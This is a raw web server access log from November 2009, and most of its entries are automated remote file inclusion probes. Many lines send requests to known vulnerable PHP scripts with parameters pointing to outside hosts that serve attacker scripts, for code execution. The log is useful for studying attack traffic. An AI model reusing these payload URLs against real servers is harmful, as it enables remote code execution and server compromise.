124.0.143.66 - - [12/Nov/2009:06:40:47 -0600] "GET //include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.143.66 - - [12/Nov/2009:06:40:47 -0600] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:42:32 -0600] "GET //com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:42:32 -0600] "GET /logs/access_log.1246752000//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:42:32 -0600] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:42:32 -0600] "GET /logs/access_log.1245110400//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
200.29.90.110 - - [12/Nov/2009:06:46:29 -0600] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.29.90.110 - - [12/Nov/2009:06:46:29 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
200.29.90.110 - - [12/Nov/2009:06:47:06 -0600] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.29.90.110 - - [12/Nov/2009:06:47:06 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.137.0.63 - - [12/Nov/2009:06:47:38 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 342 "-""-"
216.139.67.116 - - [12/Nov/2009:06:50:43 -0600] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 317 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:06:50:43 -0600] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
115.86.49.6 - - [12/Nov/2009:06:52:03 -0600] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:06:52:03 -0600] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:06:52:03 -0600] "GET /logs/access_log.1241395200///s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:06:53:52 -0600] "GET //skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:06:53:52 -0600] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:06:53:52 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:06:54:08 -0600] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:06:54:57 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:06:54:57 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:06:54:57 -0600] "GET /logs/access_log.1245715200//admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:55:37 -0600] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:55:37 -0600] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:55:41 -0600] "GET /logs/access_log.1237075200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
82.98.145.78 - - [12/Nov/2009:06:55:41 -0600] "GET /logs/access_log.1235779200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
77.222.40.234 - - [12/Nov/2009:06:56:18 -0600] "GET //common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 297 "-""Mozilla/5.0"
77.222.40.234 - - [12/Nov/2009:06:56:18 -0600] "GET /logs//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 302 "-""Mozilla/5.0"
77.222.40.234 - - [12/Nov/2009:06:56:18 -0600] "GET /logs/access_log.1253491200//common/db.php?commonpath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:06:56:39 -0600] "GET /logs/access_log.1254441600//admin/spaw/spaw_control.class.php?spaw_root=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:06:58:09 -0600] "GET ///include/print_category.php?setup[use_category]=1&dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:06:58:09 -0600] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.189.39.159 - - [12/Nov/2009:06:58:09 -0600] "GET /logs/access_log.1228608000///include/print_category.php?setup[use_category]=1&dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:06:58:43 -0600] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:06:58:43 -0600] "GET /logs/access_log.1231804800//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:06:58:43 -0600] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.138.172.3 - - [12/Nov/2009:06:58:43 -0600] "GET /logs/access_log.1231286400//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:06:59:33 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:06:59:34 -0600] "GET //skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:06:59:34 -0600] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:06:59:36 -0600] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.139.67.116 - - [12/Nov/2009:06:59:38 -0600] "GET /logs//include/lib.inc.php?site_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 308 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:06:59:38 -0600] "GET //include/lib.inc.php?site_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 303 "-""libwww-perl/5.64"
82.98.145.78 - - [12/Nov/2009:07:02:23 -0600] "GET /logs/access_log.1235347200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:03:04 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:03:04 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:03:06 -0600] "GET /logs/access_log.1245715200//admin/spaw/spaw_control.class.php?spaw_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
115.86.49.6 - - [12/Nov/2009:07:03:13 -0600] "GET /logs/access_log.1233619200///s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.106.231 - - [12/Nov/2009:07:03:42 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.231 - - [12/Nov/2009:07:04:25 -0600] "GET /logs/access_log.1132617600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.208 - - [12/Nov/2009:07:06:25 -0600] "GET /logs/access_log.1106352000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.174.0.17 - - [12/Nov/2009:07:06:28 -0600] "GET /logs/access_log.1254441600//admin/spaw/spaw_control.class.php?spaw_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.207.122 - - [12/Nov/2009:07:07:25 -0600] "GET /logs/access_log.1253491200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:07 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:14 -0600] "GET /logs/access_log.1252540800//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:14 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:14 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:32 -0600] "GET /logs/access_log.1249776000//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:35 -0600] "GET /logs/access_log.1252540800//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:35 -0600] "GET /logs/access_log.1252540800//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:35 -0600] "GET /logs/access_log.1249776000//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:36 -0600] "GET /logs/access_log.1249776000//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:37 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:37 -0600] "GET /logs/access_log.1240963200//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:37 -0600] "GET /logs/access_log.1249862400//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:37 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:39 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:39 -0600] "GET /logs/access_log.1249862400//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:39 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:40 -0600] "GET //tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
91.192.20.164 - - [12/Nov/2009:07:12:40 -0600] "GET /logs/access_log.1240963200//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:40 -0600] "GET /logs//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:40 -0600] "GET /logs/access_log.1252540800//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:07:12:40 -0600] "GET /logs/access_log.1249776000//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:41 -0600] "GET /logs/access_log.1252540800//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:41 -0600] "GET /logs/access_log.1252540800//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:41 -0600] "GET /logs/access_log.1249776000//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:07:12:41 -0600] "GET /logs/access_log.1249776000//tags.php?BBCodeFile=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.80.193.30 - - [12/Nov/2009:07:18:37 -0600] "GET /logs/access_log.1216512000 HTTP/1.0" 200 57279 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; SIMBAR={E29DBDC4-E48E-4d66-815F-044EA6799D77}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; HbTools 4.8.4)"
208.80.193.30 - - [12/Nov/2009:07:20:22 -0600] "GET /logs/access_log.1205971200 HTTP/1.0" 200 150636 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={B267C3A3-E9E1-4e6c-8F6A-CC45A678FC2E}; FunWebProducts; SIMBAR=0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; ZangoToolbar 4.8.3)"
85.25.94.14 - - [12/Nov/2009:07:22:11 -0600] "GET /logs/access_log.1245456000//components/com_jreactions/langset.php?comPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:07:22:11 -0600] "GET /logs//components/com_jreactions/langset.php?comPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:07:22:11 -0600] "GET //components/com_jreactions/langset.php?comPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:07:22:29 -0600] "GET /logs/access_log.1243468800//components/com_jreactions/langset.php?comPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
65.55.107.180 - - [12/Nov/2009:07:23:24 -0600] "GET /logs/access_log.1253664000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.148.120.132 - - [12/Nov/2009:07:23:37 -0600] "GET //theme.php?THEME_DIR=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:37 -0600] "GET /logs//theme.php?THEME_DIR=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:37 -0600] "GET /logs/access_log.1242172800//theme.php?THEME_DIR=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:39 -0600] "GET /logs//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:39 -0600] "GET //theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:39 -0600] "GET /logs/access_log.1242172800//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:41 -0600] "GET /logs/access_log.1242172800//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:41 -0600] "GET //theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:41 -0600] "GET /logs//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:42 -0600] "GET /logs/access_log.1242086400//theme.php?THEME_DIR=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:44 -0600] "GET /logs/access_log.1242086400//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:23:46 -0600] "GET /logs/access_log.1242086400//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.205.103.171 - - [12/Nov/2009:07:24:31 -0600] "GET /logs/access_log.1243900800/?mosConfig_absolute_path=http://flateen.com/.../id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.205.103.171 - - [12/Nov/2009:07:24:32 -0600] "GET /logs/?mosConfig_absolute_path=http://flateen.com/.../id1.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
67.205.103.171 - - [12/Nov/2009:07:24:39 -0600] "GET /?mosConfig_absolute_path=http://flateen.com/.../id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:25:30 -0600] "GET /logs/access_log.1242172800//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:25:30 -0600] "GET /logs//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:25:30 -0600] "GET //theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:25:48 -0600] "GET /logs/access_log.1242086400//theme.php?THEME_DIR=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:26:03 -0600] "GET /logs/access_log.1249948800//infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:26:04 -0600] "GET /logs//infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:26:04 -0600] "GET //infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
93.174.0.17 - - [12/Nov/2009:07:26:04 -0600] "GET /logs/access_log.1249516800//infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.86.146.15 - - [12/Nov/2009:07:27:02 -0600] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 318 "-""-"
116.127.121.116 - - [12/Nov/2009:07:28:57 -0600] "GET //uks_board_v3010/modify_comment.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:28:57 -0600] "GET /logs/access_log.1252972800//uks_board_v3010/modify_comment.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
116.127.121.116 - - [12/Nov/2009:07:28:59 -0600] "GET /logs//uks_board_v3010/modify_comment.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:29:22 -0600] "GET //tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:29:22 -0600] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:29:22 -0600] "GET /logs/access_log.1230768000//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.251.28.214 - - [12/Nov/2009:07:29:53 -0600] "GET /logs/access_log.1229299200//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:14 -0600] "GET /?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:14 -0600] "GET /logs/access_log.1242864000/?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:19 -0600] "GET /?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:19 -0600] "GET /logs/access_log.1242864000/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:27 -0600] "GET /logs/access_log.1242864000/?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:27 -0600] "GET /?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:33 -0600] "GET /?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:33 -0600] "GET /logs/access_log.1242864000/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:33 -0600] "GET /logs/?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:39 -0600] "GET /logs/?p=http://fia.fileave.com/enda.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
66.148.120.132 - - [12/Nov/2009:07:30:40 -0600] "GET /?p=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
